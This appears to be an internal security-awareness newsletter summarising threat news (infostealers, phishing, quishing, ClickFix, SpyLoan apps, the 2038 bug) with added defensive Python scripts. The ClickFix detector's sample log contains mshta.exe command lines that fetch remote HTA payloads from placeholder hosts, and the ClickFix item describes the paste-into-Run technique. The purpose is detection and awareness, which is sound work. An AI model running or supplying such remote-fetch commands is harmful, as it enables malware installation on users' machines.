This is a monthly newsletter I put together for an internal security awareness program. Feel free to grab and use for your own program.
Macs Targeted by Infostealers in New Era of Cyberthreats
A new wave of cyberattacks is targeting Mac users with infostealers, malicious programs designed to steal sensitive data like passwords and credit card details. Infostealers have traditionally targeted Windows devices, but in recent years, cybercriminals have turned their attention to Macs. One such threat, Poseidon, is the most active infostealer on Mac today, stealing data from over 160 cryptocurrency wallets, web browsers, and password managers. Cybercriminals use malvertising to deliver these threats, making it crucial for Mac users to be cautious when downloading software and visiting unfamiliar websites.
Key Insights:
Poseidon and other infostealers are now targeting Macs, stealing sensitive data such as passwords and cryptocurrency wallet info.
Malicious advertising (malvertising) is being used to trick users into downloading infostealers instead of desired software.
Macs are becoming a key target for cybercriminals, and users must exercise caution and implement strong security measures.
Further Reading: Malwarebytes
Google Now Allows Digital Fingerprinting of Its Users
In a shift from its earlier stance, Google has started allowing digital fingerprinting of its users, a practice that could raise significant privacy concerns. This method collects various pieces of data—such as operating system, browser type, IP address, and plugins—to create a unique identifier for users, even when cookies are cleared. While this allows advertisers to track users across sites, it also bypasses the limitations of cookie-blocking tools.
Key Insights:
Digital fingerprinting creates a unique ID for users based on their browser and device characteristics.
This technique enables tracking even after cookies are cleared, circumventing privacy protections.
Users can take steps to counteract fingerprinting by using privacy-focused browsers, VPNs, and browser extensions.
Further Reading: Malwarebytes Blog
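The summary above describes fingerprinting in one sentence; the script below, added here as an illustration and not taken from the Malwarebytes article, shows the mechanism end to end: a handful of device attributes are hashed into a stable identifier that survives clearing cookies, and the same population of users becomes indistinguishable once a privacy browser and VPN make those attributes uniform. The attribute names and the five sample profiles are constructed for the example; real trackers collect far more signals (fonts, canvas, screen metrics).

```python
"""Added example: how a browser fingerprint is derived and why uniform
attribute values defeat it. Attribute names and profiles are constructed."""
import hashlib
import json
from collections import Counter


def fingerprint(attrs: dict) -> str:
    """Hash a dict of browser/device attributes into a stable identifier.

    Cookies are deliberately not part of the input: clearing them leaves
    the identifier unchanged, which is the privacy problem the article describes.
    """
    canonical = json.dumps(attrs, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode()).hexdigest()[:16]


def anonymity_sets(profiles: list) -> dict:
    """Map each fingerprint to the number of profiles sharing it.

    A fingerprint shared by one profile singles that user out; one shared
    by many is useless to a tracker.
    """
    return dict(Counter(fingerprint(p) for p in profiles))


def unique_fraction(profiles: list) -> float:
    """Fraction of profiles that are uniquely identifiable by fingerprint."""
    sets = anonymity_sets(profiles)
    unique = sum(1 for p in profiles if sets[fingerprint(p)] == 1)
    return unique / len(profiles)


# Constructed sample population: five ordinary browser setups (IPs from the
# documentation range 203.0.113.0/24).
ORDINARY = [
    {"os": "Windows 11", "browser": "Chrome 133", "ip": "203.0.113.10",
     "plugins": ["PDF Viewer"], "screen": "1920x1080", "tz": "America/New_York"},
    {"os": "macOS 15", "browser": "Safari 18", "ip": "203.0.113.11",
     "plugins": [], "screen": "2560x1600", "tz": "America/Los_Angeles"},
    {"os": "Windows 10", "browser": "Chrome 133", "ip": "203.0.113.12",
     "plugins": ["PDF Viewer", "Widevine"], "screen": "1366x768", "tz": "Europe/Berlin"},
    {"os": "Ubuntu 24.04", "browser": "Firefox 135", "ip": "203.0.113.13",
     "plugins": [], "screen": "1920x1080", "tz": "Europe/London"},
    {"os": "Windows 11", "browser": "Edge 133", "ip": "203.0.113.14",
     "plugins": ["PDF Viewer"], "screen": "1920x1080", "tz": "America/Chicago"},
]


def hardened(profile: dict) -> dict:
    """Same user behind a privacy-focused browser and a shared VPN exit:
    the browser reports generic values, so the profile loses its identity.
    (Constructed: models the countermeasures the article lists.)"""
    return {"os": "Windows 10", "browser": "Firefox 135", "ip": "198.51.100.1",
            "plugins": [], "screen": "1920x1080", "tz": "UTC"}


HARDENED = [hardened(p) for p in ORDINARY]

if __name__ == "__main__":
    print("uniquely identifiable (ordinary):", unique_fraction(ORDINARY))
    print("uniquely identifiable (hardened):", unique_fraction(HARDENED))
    print("distinct ids among hardened users:", len(anonymity_sets(HARDENED)))
```

The point for awareness training is the second number: the countermeasure is not hiding the fingerprint but making it identical to everyone else's, which is what privacy browsers and shared VPN exits achieve.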
FTC Reports $12.5 Billion in Fraud Losses in 2024
The Federal Trade Commission (FTC) has revealed a staggering increase in fraud-related losses, with reported damages reaching $12.5 billion in 2024. This surge is driven by a combination of online scams, phishing, and identity theft, with a notable increase in fraud targeting older adults and specific industries. As scammers continue to refine their techniques, organizations must remain vigilant and proactive in educating employees and customers on how to recognize and avoid these threats.
Key Insights:
Fraud losses in 2024 hit $12.5 billion, with a significant increase in online scams and identity theft.
Older adults and certain sectors are being disproportionately targeted.
Organizations must enhance education efforts and improve customer protection measures to mitigate the growing threat.
Further Reading: FTC Press Release
DeepSeek Found to Be Sharing User Data with TikTok Parent Company ByteDance
DeepSeek, an AI app, has been caught secretly sharing user data with ByteDance, the parent company of TikTok. The South Korean Personal Information Protection Commission (PIPC) uncovered that DeepSeek automatically transmitted user data every time the app was accessed, doing so without user consent. This data-sharing practice raises serious concerns about privacy, particularly in light of the ongoing scrutiny surrounding ByteDance’s handling of user data. South Korea has removed DeepSeek from app stores and is considering stronger regulations on foreign companies in the country.
Key Insights:
DeepSeek was found transmitting user data to ByteDance servers without user consent.
This app highlights growing concerns about data privacy in AI technologies.
South Korea has taken action by removing the app and considering stronger regulations on foreign tech companies.
Further Reading: Malwarebytes
Beware of DeepSeek Hype: It's a Breeding Ground for Scammers
As DeepSeek, an AI language model from China, gains popularity, cybercriminals are capitalizing on its rise with various scams targeting unsuspecting users. Fake websites, malicious developer tools, phishing on social media, and fraudulent investment schemes are being used to trick individuals into disclosing sensitive data or suffering financial losses. Scammers are even leveraging DeepSeek's name to promote fake cryptocurrency tokens and fake pre-IPO shares.
Key Insights:
Scammers are using fake websites and social media accounts to impersonate DeepSeek and steal user data.
Malicious Python packages were uploaded to PyPI, disguised as DeepSeek developer tools, to steal sensitive information.
Individuals and businesses must be cautious when downloading tools, verify sources, and implement strong security practices.
Further Reading: SecurityWeek
Predatory App Downloaded 100,000 Times from Google Play Store Steals Data, Uses It for Blackmail
A malicious financial app, "Finance Simplified," has been downloaded over 100,000 times from the Google Play Store. This app, which belongs to the SpyLoan family, promises attractive loan terms but steals sensitive data such as contacts, call logs, and photos. Once the data is collected, the app uses it for blackmail, especially targeting users who fail to make loan payments. Although the app has been removed from the store, it continues to run on affected devices, collecting sensitive data in the background. Users are advised to change passwords, enable two-factor authentication, and monitor their identity for any misuse.
Key Insights:
The app, masquerading as a loan provider, collects personal data for blackmail purposes.
Although removed from the Google Play Store, the app still runs on affected devices.
Users should take immediate steps to secure their data by changing passwords and enabling two-factor authentication.
Further Reading: Malwarebytes
Microsoft 365 Targeted in New Phishing, Account Takeover Attacks
New phishing campaigns are leveraging Microsoft 365's infrastructure to conduct account takeover (ATO) attacks, exploiting tenant misconfigurations and using OAuth redirection. One campaign involves attackers sending phishing emails using Microsoft’s own infrastructure, making detection difficult. These emails, masquerading as legitimate Microsoft notifications, direct victims to call centers, bypassing security controls. Another attack uses OAuth apps pretending to be Adobe and DocuSign to steal credentials and deploy malware. Security teams must be vigilant in securing OAuth applications and scrutinizing internal communications.
Key Insights:
Phishing attacks are exploiting Microsoft 365’s infrastructure for ATO attacks.
Attackers use fake support contacts and legitimate-looking emails to trick victims.
OAuth applications masquerading as trusted brands are used for stealing credentials and deploying malware.
Further Reading: SecurityWeek
The Epochalypse Project: Addressing the 2038 Bug
The Epochalypse Project is raising awareness about the 2038 bug, a critical vulnerability in 32-bit timestamp systems that will impact billions of devices worldwide starting January 19, 2038. The bug could cause major disruptions across industries, from healthcare to energy management, due to systems misinterpreting dates and malfunctioning. As the 2038 deadline approaches, the project aims to bring attention to this issue and develop solutions before it becomes a widespread problem.
Key Insights:
The bug affects embedded devices and systems like medical equipment, IoT devices, and transportation infrastructure.
If unaddressed, it could cause critical system failures, including banking and security disruptions.
The project encourages global collaboration to identify and fix vulnerable systems before 2038.
Further Reading: Epochalypse Project
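To make the rollover concrete, the script below (added here; not from the Epochalypse Project) reproduces what a signed 32-bit timestamp does one second after 03:14:07 UTC on January 19, 2038, and then scans a constructed set of expiry dates of the kind an embedded device might store (certificates, contracts, tokens) for values such a system would misread. The record names and dates are made up for the example.

```python
"""Added example: the 32-bit signed time_t rollover and a scan for dates a
32-bit system cannot represent. Sample records are constructed."""
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
TIME32_MAX = 2**31 - 1   # 2147483647 seconds after the epoch
TIME32_MIN = -2**31


def to_unix(dt: datetime) -> int:
    """Seconds since the Unix epoch for a timezone-aware datetime."""
    return int((dt - EPOCH).total_seconds())


def from_unix(ts: int) -> datetime:
    """Inverse of to_unix; plain arithmetic so negative values work on every platform."""
    return EPOCH + timedelta(seconds=ts)


def to_time32(ts: int) -> int:
    """Store ts the way a signed 32-bit time_t would: keep the low 32 bits and
    reinterpret them as signed. Anything past TIME32_MAX wraps negative."""
    low32 = struct.pack("<q", ts)[:4]        # little-endian 64-bit, low 4 bytes
    return struct.unpack("<i", low32)[0]


def fits_time32(ts: int) -> bool:
    return TIME32_MIN <= ts <= TIME32_MAX


def scan_records(records: list) -> list:
    """Names of records whose timestamp a 32-bit system would misinterpret."""
    return [r["name"] for r in records if not fits_time32(to_unix(r["when"]))]


# The last instant a 32-bit timestamp can hold, and what the next second becomes.
LIMIT_DT = from_unix(TIME32_MAX)
WRAPPED_DT = from_unix(to_time32(TIME32_MAX + 1))

# Constructed sample: expiry-style dates an embedded device might store.
SAMPLE = [
    {"name": "firmware-signing-cert", "when": datetime(2035, 6, 1, tzinfo=timezone.utc)},
    {"name": "maintenance-contract", "when": datetime(2038, 1, 19, 3, 14, 7, tzinfo=timezone.utc)},
    {"name": "root-ca-cert", "when": datetime(2040, 12, 31, tzinfo=timezone.utc)},
    {"name": "long-lived-api-token", "when": datetime(2038, 1, 19, 3, 14, 8, tzinfo=timezone.utc)},
]

if __name__ == "__main__":
    print("last valid 32-bit time:", LIMIT_DT.isoformat())
    print("one second later is stored as:", to_time32(TIME32_MAX + 1), "=", WRAPPED_DT.isoformat())
    print("records a 32-bit system would misread:", scan_records(SAMPLE))
```

The wrapped value lands in December 1901, which is why affected systems do not merely stop but start making decisions (certificate validity, scheduling, billing) against a date more than a century in the past. Scanning stored dates against TIME32_MAX is a cheap first inventory step before deciding which devices need firmware updates.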
Is Firebase Phishing a Threat to Your Organization?
Firebase, a platform commonly used for app development, has been exploited in phishing attacks targeting organizations. Attackers can hijack Firebase’s authentication services to launch phishing campaigns, tricking users into divulging sensitive information. These attacks can be used to steal credentials, and in some cases, manipulate cloud-based services that organizations rely on. With Firebase being a trusted service, users may not immediately recognize these phishing attempts, making it a potent tool for attackers.
Key Insights:
Firebase is being exploited for phishing attacks, often targeting organizations’ authentication systems.
Users may unknowingly fall victim due to Firebase’s trusted reputation.
Organizations need to be aware of how Firebase can be misused and take proactive measures to secure their systems.
Further Reading: Check Point Blog
Evolution of Sophisticated Phishing Tactics: The QR Code Phenomenon
Unit 42 researchers have observed a surge in phishing attacks leveraging QR codes, a tactic known as "quishing." Attackers embed malicious URLs within QR codes in documents that mimic legitimate services like DocuSign or Adobe Acrobat Sign. When scanned, these QR codes direct users to phishing sites designed to harvest credentials. Notably, some campaigns employ legitimate website redirection mechanisms and Cloudflare Turnstile for user verification, enhancing their credibility and evading security detection. These attacks have been widespread across the U.S. and Europe, impacting industries such as medical, automotive, education, energy, and finance.
Key Insights:
Quishing Tactics: Embedding phishing URLs in QR codes increases the likelihood of users accessing malicious sites, especially when personal devices with potentially weaker security are used.
Advanced Evasion Techniques: Utilizing legitimate redirection mechanisms and services like Cloudflare Turnstile allows attackers to bypass traditional security measures.
Targeted Industries: A broad range of sectors, including medical, automotive, education, energy, and finance, have been affected, indicating the widespread applicability of this tactic.
Further Reading: Unit 42 Blog
Tax-Themed Phishing Campaigns Surge Ahead of U.S. Tax Day
As the April 15 tax deadline nears, Microsoft Threat Intelligence has observed a rise in phishing campaigns exploiting tax-related themes to steal credentials and deploy malware. These attacks use social engineering to impersonate IRS notices or tax document requests and incorporate tactics like QR codes, URL shorteners, and cloud-based file sharing to evade detection. Legitimate services, including Microsoft infrastructure, are being abused to enhance credibility and avoid filters.
Key Insights:
Attackers are using tax season as a lure for phishing, often impersonating tax authorities or financial institutions.
Tactics include QR codes, shortened URLs, and links to legitimate cloud storage to bypass security tools.
Abuse of trusted platforms increases the likelihood of successful compromise.
Further Reading: Microsoft Security Blog
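Both the QR code item above and this tax-season item describe the same three tricks behind the link: a URL shortener that hides the destination, a legitimate site's redirector that bounces the user to the phishing page, and a trusted file-sharing platform hosting the "document". The script below, added here and not part of either the Unit 42 or the Microsoft write-up, triages a decoded QR payload or e-mail link against those patterns and against the brand the lure claims. The shortener, cloud-share and brand domain lists are small assumed reference sets, and the sample links are constructed (the `.example` hosts are reserved names, not real sites).

```python
"""Added example: triage of a scanned QR code or e-mail link against the
shortener, redirector and brand-mismatch tricks described in the articles.
Reference lists and sample links are constructed for illustration."""
from urllib.parse import urlparse, parse_qs, unquote

# Assumed reference lists; a real deployment would use curated threat intel.
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "is.gd"}
CLOUD_SHARES = {"sharepoint.com", "dropbox.com", "drive.google.com", "onedrive.live.com"}
BRAND_DOMAINS = {
    "docusign": {"docusign.com", "docusign.net"},
    "adobe": {"adobe.com", "adobesign.com"},
    "irs": {"irs.gov"},
}


def host_matches(host: str, domains: set) -> bool:
    """True when host is one of domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in domains)


def embedded_redirect(url: str):
    """Return the first absolute http(s) URL carried in a query parameter
    (the open-redirector pattern), else None. parse_qs already percent-decodes."""
    for values in parse_qs(urlparse(url).query).values():
        for v in values:
            candidate = unquote(v)
            p = urlparse(candidate)
            if p.scheme in ("http", "https") and p.netloc:
                return candidate
    return None


def triage(claimed_brand: str, url: str) -> list:
    """Reasons to distrust a link that claims to come from claimed_brand."""
    reasons = []
    host = (urlparse(url).hostname or "").lower()
    if host_matches(host, SHORTENERS):
        reasons.append("url shortener hides final destination")
    target = embedded_redirect(url)
    if target:
        final_host = (urlparse(target).hostname or "").lower()
        reasons.append(f"redirects through {host} to {final_host}")
        host = final_host  # judge the brand against where the user actually ends up
    if host_matches(host, CLOUD_SHARES):
        reasons.append("document hosted on a file-sharing service rather than the brand's own domain")
    expected = BRAND_DOMAINS.get(claimed_brand.lower())
    if expected and not host_matches(host, expected):
        reasons.append(f"claims {claimed_brand} but lands on {host}")
    return reasons


# Constructed decoded QR payloads / e-mail links paired with the brand the lure claims.
SAMPLES = [
    ("docusign", "https://na3.docusign.net/Signing/?ti=abc"),          # plausible
    ("docusign", "https://bit.ly/3xyzExample"),                         # shortener
    ("adobe", "https://trusted-site.example/redirect?url=https%3A%2F%2Fsign-adobe.example%2Flogin"),  # redirector
    ("irs", "https://contoso.sharepoint.com/:b:/s/tax/IRS-Notice.pdf"),  # cloud share
]

if __name__ == "__main__":
    for brand, link in SAMPLES:
        print(brand, link, "->", triage(brand, link) or ["no findings"])
```

The redirect branch is the one worth explaining to users: the first hostname they see may be a perfectly legitimate site, and the phishing page is only in the parameter. The brand check deliberately evaluates the final hop, not the visible one.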
ClickFix: A Deceptive Malware Deployment Technique
Cybercriminals are employing a tactic known as "ClickFix," which masquerades as a CAPTCHA verification to trick users into executing commands that download malware. This scheme prompts users to press a series of keyboard shortcuts—Windows + R, Ctrl + V, and Enter—that open the Run dialog, paste malicious code, and execute it via mshta.exe, a legitimate Windows utility. This method has been used to deliver various malware families, including XWorm, Lumma Stealer, and AsyncRAT.
Key Insights:
ClickFix attacks exploit user actions to bypass security measures, leading to the installation of credential-stealing malware.
Industries such as hospitality and healthcare have been targeted, with attackers impersonating trusted entities like Booking.com.
The attack leverages legitimate Windows functionalities (mshta.exe) to execute malicious code, complicating detection efforts.
Further Reading: Krebs on Security
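The execution chain the article describes (Run dialog, pasted command, mshta.exe fetching remote content) leaves a distinctive trace in process-creation telemetry: mshta.exe started by the shell with a URL on its command line, something legitimate software almost never does. The script below is an added detection example, not from the Krebs on Security article or any vendor, that applies that rule to a few constructed process-creation events written in a Sysmon-style key=value layout (the layout itself is an assumption). It keeps a benign baseline, an installer launching a local .hta file, to show the rule does not fire on every use of mshta.

```python
"""Added example: flagging the shell-to-mshta.exe chain that ClickFix relies
on, over constructed process-creation events. Log layout is an assumption."""
import re
from typing import Optional
from urllib.parse import urlparse

# Constructed sample events; hosts use reserved/documentation names.
SAMPLE_LOG = """\
EventID=1 Image=C:\\Windows\\System32\\mshta.exe ParentImage=C:\\Windows\\explorer.exe CommandLine="mshta https://example.invalid/verify/captcha.hta"
EventID=1 Image=C:\\Windows\\System32\\mshta.exe ParentImage="C:\\Program Files\\Vendor\\setup.exe" CommandLine="mshta C:\\Program Files\\Vendor\\ui\\wizard.hta"
EventID=1 Image=C:\\Windows\\System32\\notepad.exe ParentImage=C:\\Windows\\explorer.exe CommandLine="notepad C:\\Users\\alice\\notes.txt"
EventID=1 Image=C:\\Windows\\System32\\mshta.exe ParentImage=C:\\Windows\\System32\\cmd.exe CommandLine="mshta http://203.0.113.5/x"
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> dict:
    """Turn one key=value line into a dict, stripping quotes from values."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def remote_target(cmdline: str) -> Optional[str]:
    """First http(s) URL on the command line, or None."""
    for token in cmdline.split():
        token = token.strip("\"'")
        p = urlparse(token)
        if p.scheme in ("http", "https") and p.netloc:
            return token
    return None


def classify(event: dict) -> Optional[str]:
    """Finding label for ClickFix-like activity, or None.

    mshta.exe pulling remote content is suspicious on its own; when the parent
    is explorer.exe the launch came from the shell (Run dialog, double-click)
    rather than from an installer, which matches the paste-into-Run pattern.
    """
    if basename(event.get("Image", "")) != "mshta.exe":
        return None
    url = remote_target(event.get("CommandLine", ""))
    if url is None:
        return None  # local .hta launched by a vendor installer: benign baseline
    parent = basename(event.get("ParentImage", ""))
    if parent == "explorer.exe":
        return f"high: mshta launched from shell with remote content {url}"
    return f"medium: mshta launched by {parent} with remote content {url}"


def scan(log_text: str) -> list:
    """Run classify over every non-empty line and collect the findings."""
    findings = []
    for line in log_text.splitlines():
        if line.strip():
            label = classify(parse_event(line))
            if label:
                findings.append(label)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

For awareness material the takeaway is the same as the detection logic: no legitimate CAPTCHA ever asks a user to open the Run dialog and paste something, so that instruction alone is the tell.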
Pharmacist Allegedly Used Keyloggers to Spy on Coworkers at Maryland Hospital
A former pharmacist at the University of Maryland Medical Center is accused of secretly installing keylogging software on nearly 400 hospital computers over a decade. The class-action lawsuit claims he accessed coworkers’ login credentials, personal files, and even activated webcams in patient exam rooms. The hospital is also being sued for allegedly failing to detect or respond to the breach in a timely manner.
Key Insights:
Keyloggers were reportedly used to steal credentials and access private communications.
The software was allegedly installed across hundreds of hospital systems without detection.
The incident underscores the importance of monitoring for insider threats and unauthorized software.
Further Reading: The Record